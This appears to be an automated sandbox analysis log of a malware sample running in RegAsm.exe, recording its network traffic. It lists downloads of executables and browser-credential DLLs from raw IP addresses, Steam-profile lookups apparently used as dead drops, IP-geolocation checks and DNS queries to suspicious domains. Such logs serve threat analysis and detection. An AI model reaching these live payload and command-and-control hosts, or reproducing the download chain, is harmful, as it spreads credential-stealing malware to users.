Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.104

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 5_2_0050BBB0 InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

5_2_0050BBB0

Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: api64.ipify.org
Source: global traffic	HTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /1nhuM4.js HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: iplogger.org
Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.197.9Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET /ldms/66fb252fe232b_Patksl.exe HTTP/1.1Host: 147.45.44.104Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api/wp-ping.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 41.216.188.190
Source: global traffic	HTTP traffic detected: GET /ldms/66fbfccd837ac_vadggdsa.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66fbfcc301a31_swws.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 46.8.231.109Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ldms/66fbfcc9963ca_ldfsna.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET /ldms/66fbfcc9963ca_ldfsna.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 46.8.231.109Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ldms/66fbfcc9963ca_ldfsna.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org

Source: RegAsm.exe, 00000029.00000002.3091506097.000000000113A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.000000000111A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: '; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: yalubluseks.eu
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: api64.ipify.org
Source: global traffic	DNS traffic detected: DNS query: ipinfo.io
Source: global traffic	DNS traffic detected: DNS query: iplogger.org
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: chorusarorp.site
Source: global traffic	DNS traffic detected: DNS query: questionsmw.store
Source: global traffic	DNS traffic detected: DNS query: soldiefieop.site
Source: global traffic	DNS traffic detected: DNS query: abnomalrkmu.site
Source: global traffic	DNS traffic detected: DNS query: treatynreit.site
Source: global traffic	DNS traffic detected: DNS query: snarlypagowo.site
Source: global traffic	DNS traffic detected: DNS query: mysterisop.site
Source: global traffic	DNS traffic detected: DNS query: absorptioniw.site
Source: global traffic	DNS traffic detected: DNS query: gravvitywio.store
Source: global traffic	DNS traffic detected: DNS query: cowod.hopto.org

Source: unknown

HTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continueConnection: Keep-Alive

Source: RegAsm.exe, 00000029.00000002.3091506097.000000000113A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.000000000111A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: RegAsm.exe, 0000002D.00000002.2959845385.0000000001288000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe
Source: RegAsm.exe, 0000001E.00000002.2527499922.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exe1kkkk1264116http://147.45.44.104/ldms/66fbfccd837a
Source: RegAsm.exe, 0000002D.00000002.2984290523.00000000277F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exeF
Source: RegAsm.exe, 0000000F.00000002.2327203276.0000000001149000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exeN
Source: RegAsm.exe, 0000000F.00000002.2327203276.0000000001149000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exeS
Source: RegAsm.exe, 0000002D.00000002.2984290523.00000000277F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exeU
Source: RegAsm.exe, 0000000F.00000002.2327203276.0000000001149000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exee
Source: RegAsm.exe, 0000001E.00000002.2527499922.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exerm-data;
Source: RegAsm.exe, 00000005.00000002.1881533785.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.1881533785.0000000001425000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2351185924.000000002766B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2327203276.0000000001149000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000145C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2959845385.000000000126D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2959845385.0000000001288000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/ldms/66fbfccd837ac_vadggdsa.exe
Source: RegAsm.exe, 0000001E.00000002.2527499922.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/ldms/66fbfccd837ac_vadggdsa.exe-data;
Source: RegAsm.exe, 00000005.00000002.1881533785.0000000001425000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2351185924.000000002766B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/ldms/66fbfccd837ac_vadggdsa.exeC:
Source: RegAsm.exe, 00000005.00000002.1881533785.0000000001425000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/ldms/66fbfccd837ac_vadggdsa.exeF-h
Source: RegAsm.exe, 00000005.00000002.1881533785.00000000013AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/ldms/66fbfccd837ac_vadggdsa.exeMH$
Source: RegAsm.exe, 0000002D.00000002.2959845385.000000000126D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/ldms/66fbfccd837ac_vadggdsa.exenY
Source: RegAsm.exe, 00000005.00000002.1881533785.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.1881533785.0000000001425000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000145C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66fbfcc301a31_swws.exe
Source: RegAsm.exe, 00000005.00000002.1881533785.0000000001425000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66fbfcc301a31_swws.exeC:
Source: RegAsm.exe, 0000001E.00000002.2527499922.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66fbfcc301a31_swws.exeform-data;
Source: RegAsm.exe, 00000005.00000002.1881533785.0000000001425000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66fbfcc301a31_swws.exen-
Source: RegAsm.exe, 00000005.00000002.1881533785.0000000001425000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.104/prog/66fbfcc301a31_swws.exen.
Source: RegAsm.exe, 00000005.00000002.1881533785.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.1881533785.000000000137C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://41.216.188.190/
Source: RegAsm.exe, 00000005.00000002.1881533785.00000000013AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://41.216.188.190/api/wp-admin.php
Source: RegAsm.exe, 00000005.00000002.1882907666.0000000003B05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://41.216.188.190/api/wp-admin.php)P
Source: RegAsm.exe, 00000005.00000002.1881533785.00000000013AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://41.216.188.190/api/wp-admin.phpR
Source: RegAsm.exe, 00000005.00000002.1881533785.000000000134A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://41.216.188.190/api/wp-ping.php
Source: RegAsm.exe, 00000005.00000002.1881533785.0000000001391000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://41.216.188.190/api/wp-ping.php&
Source: RegAsm.exe, 00000005.00000002.1881533785.000000000134A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://41.216.188.190/api/wp-ping.phpy
Source: RegAsm.exe, 00000005.00000002.1881533785.00000000013AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://41.216.188.190:80/api/wp-admin.php
Source: RegAsm.exe, 00000005.00000002.1881533785.0000000001391000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://41.216.188.190:80/api/wp-ping.php
Source: RegAsm.exe, 0000000F.00000002.2327203276.00000000010EA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2325083864.00000000005CB000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2959845385.000000000122A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2952782251.00000000005CB000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109
Source: RegAsm.exe, 0000000F.00000002.2327203276.000000000112D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/
Source: RegAsm.exe, 0000000F.00000002.2327203276.0000000001149000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2959845385.0000000001288000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/freebl3.dll
Source: RegAsm.exe, 0000002D.00000002.2959845385.0000000001288000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/freebl3.dll7
Source: RegAsm.exe, 0000000F.00000002.2327203276.0000000001149000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/freebl3.dllk
Source: RegAsm.exe, 0000000F.00000002.2327203276.0000000001149000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2959845385.0000000001288000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/mozglue.dll
Source: RegAsm.exe, 0000000F.00000002.2327203276.0000000001149000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll
Source: RegAsm.exe, 0000002D.00000002.2959845385.0000000001288000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll3
Source: RegAsm.exe, 0000000F.00000002.2327203276.0000000001149000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dllK
Source: RegAsm.exe, 0000002D.00000002.2959845385.0000000001288000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll_
Source: RegAsm.exe, 0000000F.00000002.2327203276.00000000010EA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2959845385.000000000122A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/nss3.dll
Source: RegAsm.exe, 0000000F.00000002.2327203276.00000000010EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/nss3.dll;
Source: RegAsm.exe, 0000000F.00000002.2327203276.0000000001149000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2959845385.0000000001288000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll
Source: RegAsm.exe, 0000000F.00000002.2327203276.0000000001149000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2959845385.0000000001288000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/sqlite3.dll
Source: RegAsm.exe, 0000000F.00000002.2327203276.0000000001149000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://46.8.231.109/1309cdeb8f4c8736/sqlite3.dll5
